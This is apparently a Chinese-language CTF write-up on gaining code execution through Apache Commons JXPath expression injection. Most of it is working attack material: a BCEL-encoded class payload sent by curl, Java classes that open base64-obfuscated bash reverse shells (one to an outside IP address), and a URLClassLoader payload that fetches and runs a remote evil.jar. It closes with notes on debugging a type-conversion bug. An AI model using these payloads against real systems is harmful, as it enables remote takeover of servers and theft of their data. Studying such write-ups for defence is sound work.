query=runMain(com.sun.org.apache.bcel.internal.util.JavaWrapper.new(),"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$c9w$d3F$Y$ffMb$5b$b2$y$g$e2$E$82$d8w$9c$40$ecR$ba$40$C$94$90$Q$a08$81b$m$85P$40Q$86D$c4$96$8c$q$t$a1$fbBw$ba$aft$a1$x$a5$eb$a1$X$c3$83G$l$e7$k$fb$5e$P$fd$T$faz$e8$b5$87$3e$dao$q$9b$d8$c4$b4$f5a4$f3$ad$bf$f9$b6$f1O$d7$_$ff$I$e0N$7c$af$m$8a$fd$K$O$60$40$y$P$c88$a8$e0$Q$Ge$i$96$f0$a0$C$JG$q$iUp$M$ba$8c$n$Z$86$8ca$Z$5cF$b7$e0$j$971$o$a3G$c2$a8$900e$f4$ca8$a1$60$MY$FM$c8$c9$b0$c4$d7$96$91$97qRl$j$Z$ae$MOFA$c6$b8p$3d$ncR$c2$v$F$P$e1a$b1$3c$a2$e0Q$3c$a6$609$k$97$f1$84$f8$3e$v$96$a7d$3c$z$e3$b4$84g$Y$o$hM$cb$f463$d4$tZ$P0$84$ba$eda$ce$d0$906$z$de_$c8$Nqg$9f$3e$94$rJ$3cm$hz$f6$80$ee$98$e2$5c$o$86$bcQ$d3ehL$Pq$p$9b$ca$e4$j$d3$g$d96nf$3b$Z$c2Gs$bai1$ccN$M$a6O$e8$e3z$w$ab$5b$p$a9$8c$tD$3a$7dO$ba32$ce$d0T$83$cd$c0$Mau$8a$d1$9d$d5$5dW$d0s$Ms$x$e8$O$3f$9e$e5$86$97$ea$e3$de$a8$3d$y$El$BuJ$60$f7$d0$J$e2$T$a3$$$b7$96$7c$3a$dc$cd$d3U$j$7e$92$n$3a$c2$bd$B$c7$f4$b8$T$ecwp$7dX$ec$p$T$rb$bd$91$h$ae$b6v$D$9fl$d8$b9$9cn$N$d3$e5c$c6$a8$ee$b8$dc$eb$d7s$U$91$Z$ZO7$c6$fa$f4$bc$l$n$J$h$u$ef$S$9e$a5$acSZ$Z$94m$93$G$cf$7b$a6m$b9$S$9ec$98$Z$A$df$a3$3b$a4MN$c9$9e$92$b1$L$8e$c1$7bM$R$e0$86$a9$98$s$F$M$V$v$dc$$$e1y$V$_$e0E$V$_$e1$M$c3F$db$ZI$ba$be$dcqaf$c2v$c6$92$T$7c$ui$d8$96$c7$t$bd$q$dd$b6$c0$5d$_$b97$f8v$H$e4$jv$96$ae$x$e1e$V$af$e0U$86f$KAI$a2$cb$a3$7b$O$V$3cNp$gnJ$82$8a$d7$f0$3a$B$bf9$c4tI$Vo$e0M$86$z$ff$XO$86$3b$e3$d9$9aNc$3e$W7Oa$a2$m$uS$c8$Y$W$I$c7$93I7$d0$9d$b2$R$I$abxK$a0$5bQ$z4$eay$f9$e4$OZ$aa$3dV$dd$oH$ad$8a$b7$f1$O$83d$bbI$8b$a0KxW$c5$7b8$ab$e2$7d$7c$m$w$c3$b4$86$ed$J$V$l$e2$p$w$8f$ed$5bwQ$9d$ef$df$d7$db$be$5e$c59$nP$3f$b0$b3$9fJ$zE$d5$x$a5$86L$x$e5R$ce$eb$da$N$V$l$e3$T$a2$89$a0xY$ea$8aF$dfq$c13$a9k$M$dd$b2D$o$3eU$f1$Z$3eW$f1$F$ceK$f8R$c5$F$7c$r$d2$fd5Y8$dc$a5$e2$h$7c$ab$e2$3b$e1$r$7c$3c$5b$Q$86$c3F$d6$W$f1i$b8$a9$fb$Y$e6$dc$aaC$a8$df$a6X7j$b1$w$Q$fbF$jj$E$aad$a3$e08$dc$f2$ca$e7$e6Dk$faf$v$ea$84Y$94$9cRE$f9$f5$91$b6$83$$$d2$aa$c4$xXB$a7$s$83$ba0K$h$9fB$vL$d4$Y$h5$s$82$e8$dc$f2$dd$b6$d4$d0$Z$9c$a6$d3$fao$f3$pbZ$e3$f6$Y$FuCb$fa$U$Z$9cNj$ad5k$g$JS$P$e5Dw$f8p$Z$db$M$g$R$5d$86$c1$5d$d7$MFg$e2$90$98$82$95$Vx$ca$f5x$$$u$fe$3d$8e$9d$e7$8ew$8aa$e5$7f$c4$e1$c6H$8ayv$da$9e$e0N$b7$$j$a2$3a$5b$95s$cb$f2h$$S$80$e7U$g$ee$a6$Z$96$R$5da$Z$bc$b3$f5$90om$7f$3e_$b6$s$8b$q$Hyi$9a$9e$d7$cer$3d$fb$a4$bd$F$cb3s$e5$b6$z$lfU$a9$95$c8$a4$Y$e2$93$9c$ba$rQ$f3$95$a8$mQ$40D$ec$aa$5d$95$88$M$b7$91$ab$9dV$be$e0$91$s$d7$v$86$zew$a6$9d$aa$60$90z$5b$a2$s$a3$f6$h$a5$W$5c$de$c3$b3f$$x$QV$dd$3a$X$95$ad$y$aeeQ$3f$60$J$92$f4$u$8b_$j$98$98$dc$b4$ae$a5S$8a$be$8c$be$e1$b6$8b$60$3f$f8$ec$3bh$8d$f8D$V$eb$fc$d5$X$a0$ff$Uw$d17$8a$bbq$P$ea$85r$dd$V$3a$cd$A$d8$c4$r$d4$VQ$l$P$V$RN$af$8eG$ea$afB$wB$ee$5b$c3h$X$zB$e9$_$J$c4$C$B$b5$y$b0$3a$3e$a3$b4$ed$I$adi$_$Jw$84$b5$d0$8d$7d$a4$a4y$hi$c6$h$C$e1$99$jR$89$da$u$a8$f1$QQ$P$d6$c7$9b2$82$rk2$c1h$d6$a4$60$d5$c2eKQM$d6$o$q$g$r$d1Y$q$aa$5cCS$87$S$b9Jk$y$3e$fb$SZ$8a$98$T$d7$8a$98$7b$Wr$7c$de$F2$3c$bfC$z1$W$c4$X$fa$8c$b8$W$T$caZ$y$U_$94$b9$80$Gq$5c$ec$l$97$d0$g$d6$94$8cF$be$96$c6$97UB$d2$a2$81$d7$xX$7e$f0$SVh$U$84$95E$ac$d2$d4$8bH$c4$5b$8bh$xb$b5$c03$Q$e8$ae$v$5dR$8b$96$90$97$e8$ed$d3$e8$o$5d$f5$7e$baN$60$$$adqJU$TZ$d0L$d9$9e$85v$cc$c6z$3a$f5$60$OvC$c3$m$c9$9c$c4$3c$9c$c1$7cz$i$X$d0$5b$b2$Q$e7$b1$I$97I$fa$g$96$e2W$y$c3o$f4$8f$ec$P$ac$c0$9fX$85$ebH$b0$Q$da$98$82$d5$ac$Xk$d8$R$b4$b3q$aa$oQ$S$a7$83$b4$93$fd$N$a2$40$d8$Y$3a$d0Ie$d2$c2$8ea$p6Q$R$za$H$b0$Z$f7$S$be$k$b6$O$5b$88$W$c2n$96$40$X$d1$c2$Yd$f3$b1$95v$R$9cd$Rt$TW$o$5c$bf$T$d6M$90$J$d5$cf$d8F$dc$ua$bb$8a$5el$87B$I$_b$Hy$8b$R$ces$d8I4$V$f7$91$ef$f5$I$fd$8d_$a0J$d8$r$n$z$a1OB$7fy$N6$c1$7e7$J$A$5d$b4$f9$L$8bi$8da$Pi$87$I$f3$fd$d8$x$ca$9b$91$v$ba$T2$7e$P$ec$fb$H$5e$c7$8a$9fH$L$A$A",'')

curl命令

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1:8080' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 6096' -H $'cmd: cat /flag' \
    --data-binary $'query=runMain%28com.sun.org.apache.bcel.internal.util.JavaWrapper.new%28%29%2C%22%24%24BCEL%24%24%24l%248b%24I%24A%24A%24A%24A%24A%24A%24A%248dV%24c9w%24d3F%24Y%24ffMb%245b%24b2%24y%24g%24e2%24E%2482%24d8w%249c%2440%24ecR%24ba%2440%24C%2494%2490%24Q%24a08%2481b%24m%2485P%2440Q%2486D%24c4%2496%248c%24q%24t%24a1%24fbBw%24ba%24aft%24a1%24x%24a5%24eb%24a1%24X%24c3%2483G%24l%24e7%24k%24fb%245e%24P%24fd%24T%24faz%24e8%24b5%2487%243e%24dao%24q%249b%24d8%24c4%24b4%24f5a4%24f3%24ad%24bf%24f9%24b6%24f1O%24d7%24_%24ff%24I%24e0N%247c%24af%24m%248a%24fd%24K%24O%2460%2440%24y%24P%24c88%24a8%24e0%24Q%24Ge%24i%2496%24f0%24a0%24C%24JG%24q%24iUp%24M%24ba%248c%24n%24Z%2486%248ca%24Z%245cF%24b7%24e0%24j%24971%24o%24a3G%24c2%24a8%24900e%24f4%24ca8%24a1%2460%24MY%24FM%24c8%24c9%24b0%24c4%24d7%2496%2491%2497qRl%24j%24Z%24ae%24MOFA%24c6%24b8p%243d%24ncR%24c2%24v%24F%24P%24e1a%24b1%243c%24a2%24e0Q%243c%24a6%24609%24k%2497%24f1%2484%24f8%243e%24v%2496%24a7d%243c%24z%24e3%24b4%2484g%24Y%24o%24hM%24cb%24f463%24d4%24tZ%24P0%2484%24ba%24eda%24ce%24d0%24906%24z%24de_%24c8%24Nqg%249f%243e%2494%24rJ%243cm%24hz%24f6%2480%24ee%2498%24e2%245c%24o%2486%24bcQ%24d3ehL%24Pq%24p%249b%24ca%24e4%24j%24d3%24g%24d96nf%243b%24Z%24c2Gs%24bai1%24ccN%24M%24a6O%24e8%24e3z%24w%24ab%245b%24p%24a9%248c%24tD%243a%247dO%24ba32%24ce%24d0T%2483%24cd%24c0%24Mau%248a%24d1%249d%24d5%245dW%24d0s%24Ms%24x%24e8%24O%243f%249e%24e5%2486%2497%24ea%24e3%24de%24a8%243d%24y%24El%24BuJ%2460%24f7%24d0%24J%24e2%24T%24a3%24%24%24b7%2496%247c%243a%24dc%24cd%24d3U%24j%247e%2492%24n%243a%24c2%24bd%24B%24c7%24f4%24b8%24T%24ecwp%247dX%24ec%24p%24T%24rb%24bd%2491%24h%24ae%24b6v%24D%249fl%24d8%24b9%249cn%24N%24d3%24e5c%24c6%24a8%24ee%24b8%24dc%24eb%24d7s%24U%2491%24Z%24ZO7%24c6%24fa%24f4%24bc%24l%24n%24J%24h%24u%24ef%24S%249e%24a5%24acSZ%24Z%2494m%2493%24G%24cf%247b%24a6m%24b9%24S%249ec%2498%24Z%24A%24df%24a3%243b%24a4MN%24c9%249e%2492%24b1%24L%248e%24c1%247bM%24R%24e0%2486%24a9%2498%24s%24F%24M%24V%24v%24dc%24%24%24e1y%24V%24_%24e0E%24V%24_%24e1%24M%24c3F%24db%24ZI%24ba%24be%24dcqaf%24c2v%24c6%2492%24T%247c%24ui%24d8%2496%24c7%24t%24bd%24q%24dd%24b6%24c0%245d%24_%24b97%24f8v%24H%24e4%24jv%2496%24ae%24x%24e1e%24V%24af%24e0U%2486f%24KAI%24a2%24cb%24a3%247b%24O%24V%243cNp%24gnJ%2482%248a%24d7%24f0%243a%24B%24bf9%24c4tI%24Vo%24e0M%2486%24z%24ff%24XO%2486%243b%24e3%24d9%249aNc%243e%24W7Oa%24a2%24m%24uS%24c8%24Y%24W%24I%24c7%2493I7%24d0%249d%24b2%24R%24I%24abxK%24a0%245bQ%24z4%24eay%24f9%24e4%24OZ%24aa%243dV%24dd%24oH%24ad%248a%24b7%24f1%24O%2483d%24bbI%248b%24a0KxW%24c5%247b8%24ab%24e2%247d%247c%24m%24w%24c3%24b4%2486%24ed%24J%24V%24l%24e2%24p%24w%248f%24ed%245bwQ%249d%24ef%24df%24d7%24db%24be%245e%24c59%24nP%243f%24b0%24b3%249fJ%24zE%24d5%24x%24a5%2486L%24x%24e5R%24ce%24eb%24da%24N%24V%24l%24e3%24T%24a2%2489%24a0xY%24ea%248aF%24dfq%24c13%24a9k%24M%24dd%24b2D%24o%243eU%24f1%24Z%243eW%24f1%24F%24ceK%24f8R%24c5%24F%247c%24r%24d2%24fd5Y8%24dc%24a5%24e2%24h%247c%24ab%24e2%243b%24e1%24r%247c%243c%245b%24Q%2486%24c3F%24d6%24W%24f1i%24b8%24a9%24fb%24Y%24e6%24dc%24aaC%24a8%24df%24a6X7j%24b1%24w%24Q%24fbF%24jj%24E%24aad%24a3%24e08%24dc%24f2%24ca%24e7%24e6Dk%24faf%24v%24ea%2484Y%2494%249cRE%24f9%24f5%2491%24b6%2483%24%24%24d2%24aa%24c4%24xXB%24a7%24s%2483%24ba0K%24h%249fB%24vL%24d4%24Y%24h5%24s%2482%24e8%24dc%24f2%24dd%24b6%24d4%24d0%24Z%249c%24a6%24d3%24fao%24f3%24pbZ%24e3%24f6%24Y%24FuCb%24fa%24U%24Z%249cNj%24ad5k%24g%24JS%24P%24e5Dw%24f8p%24Z%24db%24M%24g%24R%245d%2486%24c1%245d%24d7%24MFg%24e2%2490%2498%2482%2495%24Vx%24ca%24f5x%24%24%24u%24fe%243d%248e%249d%24e7%248ew%248aa%24e5%247f%24c4%24e1%24c6H%248ayv%24da%249e%24e0N%24b7%24%24j%24a2%243a%245b%2495s%24cb%24f2h%24%24S%2480%24e7U%24g%24ee%24a6%24Z%2496%24R%245da%24Z%24bc%24b3%24f5%2490om%247f%243e_%24b6%24s%248b%24q%24Hyi%249a%249e%24d7%24cer%243d%24fb%24a4%24bd%24F%24cb3s%24e5%24b6%24z%24lfU%24a9%2495%24c8%24a4%24Y%24e2%2493%249c%24ba%24rQ%24f3%2495%24a8%24mQ%2440D%24ec%24aa%245d%2495%2488%24M%24b7%2491%24ab%249dV%24be%24e0%2491%24s%24d7%24v%2486%24zew%24a6%249d%24aa%2460%2490z%245b%24a2%24s%24a3%24f6%24h%24a5%24W%245c%24de%24c3%24b3f%24%24x%24QV%24dd%243a%24X%2495%24ad%24y%24aeeQ%243f%2460%24J%2492%24f4%24u%248b_%24j%2498%2498%24dc%24b4%24ae%24a5S%248a%24be%248c%24be%24e1%24b6%248b%2460%243f%24f8%24ec%243bh%248d%24f8D%24V%24eb%24fc%24d5%24X%24a0%24ff%24Uw%24d17%248a%24bbq%24P%24ea%2485r%24dd%24V%243a%24cd%24A%24d8%24c4%24r%24d4%24VQ%24l%24P%24V%24RN%24af%248eG%24ea%24afB%24wB%24ee%245b%24c3h%24X%24zB%24e9%24_%24J%24c4%24C%24B%24b5%24y%24b0%243a%243e%24a3%24b4%24ed%24I%24adi%24_%24Jw%2484%24b5%24d0%248d%247d%24a4%24a4y%24hi%24c6%24h%24C%24e1%2499%24jR%2489%24da%24u%24a8%24f1%24QQ%24P%24d6%24c7%249b2%2482%24rk2%24c1h%24d6%24a4%2460%24d5%24c2eKQM%24d6%24o%24q%24g%24r%24d1Y%24q%24aa%245cCS%2487%24S%24b9Jk%24y%243e%24fb%24SZ%248a%2498%24T%24d7%248a%2498%247b%24Wr%247c%24de%24F2%243c%24bfC%24z1%24W%24c4%24X%24fa%248c%24b8%24W%24T%24caZ%24y%24U_%2494%24b9%2480%24Gq%245c%24ec%24l%2497%24d0%24g%24d6%2494%248cF%24be%2496%24c6%2497UB%24d2%24a2%2481%24d7%24xX%247e%24f0%24SVh%24U%2484%2495E%24ac%24d2%24d4%248bH%24c4%245b%248bh%24xb%24b5%24c03%24Q%24e8%24ae%24v%245dR%248b%2496%2490%2497%24e8%24ed%24d3%24e8%24o%245d%24f5%247e%24baN%2460%24%24%24adqJU%24TZ%24d0L%24d9%249e%2485v%24cc%24c6z%243a%24f5%2460%24OvC%24c3%24m%24c9%249c%24c4%243c%249c%24c1%247cz%24i%24X%24d0%245b%24b2%24Q%24e7%24b1%24I%2497I%24fa%24g%2496%24e2W%24y%24c3o%24f4%248f%24ec%24P%24ac%24c0%249fX%2485%24ebH%24b0%24Q%24da%2498%2482%24d5%24ac%24Xk%24d8%24R%24b4%24b3q%24aa%24oQ%24S%24a7%2483%24b4%2493%24fd%24N%24a2%2440%24d8%24Y%243a%24d0Ie%24d2%24c2%248ea%24p6Q%24R%24za%24H%24b0%24Z%24f7%24S%24be%24k%24b6%24O%245b%2488%24W%24c2n%2496%2440%24X%24d1%24c2%24Yd%24f3%24b1%2495v%24R%249cd%24Rt%24TW%24o%245c%24bf%24T%24d6M%2490%24J%24d5%24cf%24d8F%24dc%24ua%24bb%248a%245el%2487B%24I%24_b%24Hy%248b%24R%24ces%24d8I4%24V%24f7%2491%24ef%24f5%24I%24fd%248d_%24a0J%24d8%24r%24n%24z%24a1OB%247fy%24N6%24c1%247e7%24J%24A%245d%24b4%24f9%24L%248bi%248da%24Pi%2487%24I%24f3%24fd%24d8%24x%24ca%249b%2491%24v%24ba%24T2%247e%24P%24ec%24fb%24H%245e%24c7%248a%249fH%24L%24A%24A%22%2C%27%27%29' \
    $'http://127.0.0.1:8080/hack'

640

方法2

也可以直接使用 com.sun.org.apache.bcel.internal.util.ClassLoader ,利用BCEL,通过 loadClass 加载类,新建对象从而执行任意代码。

exp:

Evil.java

package com.example.first;
import java.io.IOException;

public class Evil {
    public Evil() throws IOException {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}");
    }
}

Main.java

package com.example.first;
import com.example.first.utils.Waf;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import org.apache.commons.jxpath.JXPathContext;

import java.io.*;

public class Main {
    public  static void main(String[] args) throws IOException{
        JavaClass cls = Repository.lookupClass(Evil.class);
        String code = com.sun.org.apache.bcel.internal.classfile.Utility.encode(cls.getBytes(), true);
        code = "$$BCEL$$" + code;
        String payload = "newInstance(loadClass(com.sun.org.apache.bcel.internal.util.ClassLoader.new(),\""+code+"\"))";
        System.out.println(payload);
    }
}

payload

newInstance(loadClass(com.sun.org.apache.bcel.internal.util.ClassLoader.new(),"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQ$5dO$TA$U$3d$d3$$$y$acE$a1$I$e2$t$f8D$c1$d6$7d$d9$98$98$82$91$401$9a$ddB$a9A$e0m$3a$j$db$a9$fbAvg$ebR$e4G$f9$a2$c6$H$7f$80$3f$cax$b7$Y$q$d1$99$cc$9c9$e7$de3$b93$f7$e7$af$ef$3f$A8X$b60$89$b2$85y$dc$9e$c2B$8e$8b$s$ee$98Xb$98$dcP$a1$d2$_$Y$8a$95$b5C$Gc$3b$eaJ$86$5b$ae$Ke3$N$3a2$7e$cb$3b$3e$ve7$S$dc$3f$e4$b1$ca$f9$l$d1$d0$7d$950$y$b9$o$Kl$99$f1$e0$d4$97$f6$7b$V$t$dan$M$95_g$b0$g$99$90$a7ZEab$e2$$$f1v$94$c6B$ee$aa$dc$3e$9d$t$3d$j$f0$n$_$c1$c4$94$89$7b$r$dc$c7$D$G$de$e1I$7f$a5$sV$ce$a5$e8G$d5$e3$60w$c4$b7$b74oo$3dy$a3$9e$7f89$3a$kv_5$3f$ba$a3F$e6$v$t$f3$G$ad$b4$b9$d3J$bd$81$e7$90v$e6$8dZ$3do$c7$J$bc$d6$e6$e6$c5$a7s$baL$3es$aa$b5$ee$e5$b9_$ad$a9$8b$S$k$e2$R$c3$e2$ff$Lg$98$cd$ab$b2$7d$k$f6$ec$bd$ce$40$K$cd0$3f$96Td$bf$de$bbz$U$c3$dc$df$c4$834$d4$w$a0wY$3d$a9$af$c8Be$cd$fd$t$87$7e$c6$90$99$U$M$ab$95k$d1$b6$8eU$d8$ab_7$ec$c7$91$90IR$c7cLP$T$f3$c1h$d2w$a1$80ib$_$J$Z$e1$cd$f5$af$60$dfP$u$X$bf$c0x$f7$99$94$C$ac$5cG$91$f6$J$Y$e4$9e$n$df$Nb$a5K$H$e1$cc$YAQj$3a$ad$d9$b1o$ee7$3a$z$U$i$3a$C$A$A"))

image-20230425144501394

方法3

还有一种方法是使用 java.net.URLClassLoader

准备 Evil.java

import java.io.IOException;

public class Evil {
    public Evil() throws IOException {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzExMi4xMjQuNDQuMjM4LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}");
    }
}

注意上面不用写包名,不然会找不到类

创建evil.jar包

javac Evil.java
jar cvf evil.jar Evil.class 

payload:

newInstance(loadClass(java.net.URLClassLoader.newInstance(java.util.Collections.singletonList(java.net.URL.new("http://127.0.0.1:8080/evil.jar"))),"Evil"))

image-20230425151111114

这里笔者找这个调用链时卡在了如何在其中传递 URL[] 类型的数据了

我们都知道可以使用 URLClassLoader 来远程加载一个类,像这样

package com.example.first;

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class Main {
    public  static void main(String[] args) throws ClassNotFoundException, MalformedURLException, InstantiationException, IllegalAccessException {

        URL[] urls = new URL[] {new URL("http://127.0.0.1:8080/evil.jar")};
        URLClassLoader.newInstance(urls).loadClass("Evil").newInstance();
    }
}

把他改写成符合 Jxpath 的语法

newInstance(loadClass(java.net.URLClassLoader.newInstance(urls),"Evil"))

可以发现一个问题,这里要给 URLClassLoader 传递的参数类型是个 URL[] ,但如何去创建这样的对象呢。

尝试直接给

newInstance(loadClass(java.net.URLClassLoader.newInstance(java.net.URL.new("http://127.0.0.1:8080/evil.jar")),"Evil"))

调试发现在 org/apache/commons/jxpath/functions/MethodFunction.java 中的 invkoe 方法中会根据执行方法的参数类型对所传入的参数进行类型转换

image-20230425160905881

但进行类型转换的时候失败了,导致最终返回的是空的URL数组。

image-20230425161037636

通过打印出的日志也能看到转换失败,给了个空的 URL 数组

image-20230425162304167

深入看看为什么会返回空的URL数组,原因是在内部 org/apache/commons/beanutils/converters/ArrayConverter.java 中调用 parseElements 方法进行转化时,对字符串的分割分组好像有bug

他的本意是想把这样的字符串 http://aaa,http://bbb,http://ccc 按逗号 , 分割,然后创建List,将这些添加进去,但似乎有些小bug,他好像把 : 后面的字符串截掉了,导致最终返回的List只有http 字符串,然后内部再转为 URL[] 时出错,返回了一个空的 URL 数组。

image-20230425162011252

从上面的分析我们能够知道将字符串转为 URL[] 类型中间会有一步是将字符串转为 List 类型,然后再将 List 类型的数据转为 URL[] 类型,既然而bug发生的地方是字符串转为 List 的时候,那我们直接给它个内容是 URL 类型的 List 数据不就可以了。

java将单个对象转为List可以使用这个静态方法

java.util.Collections.singletonList(Object o)

其返回一个 List

那么利用这个就可以成功构造我们的payload了

newInstance(loadClass(java.net.URLClassLoader.newInstance(java.util.Collections.singletonList(java.net.URL.new("http://127.0.0.1:8080/evil.jar"))),"Evil"))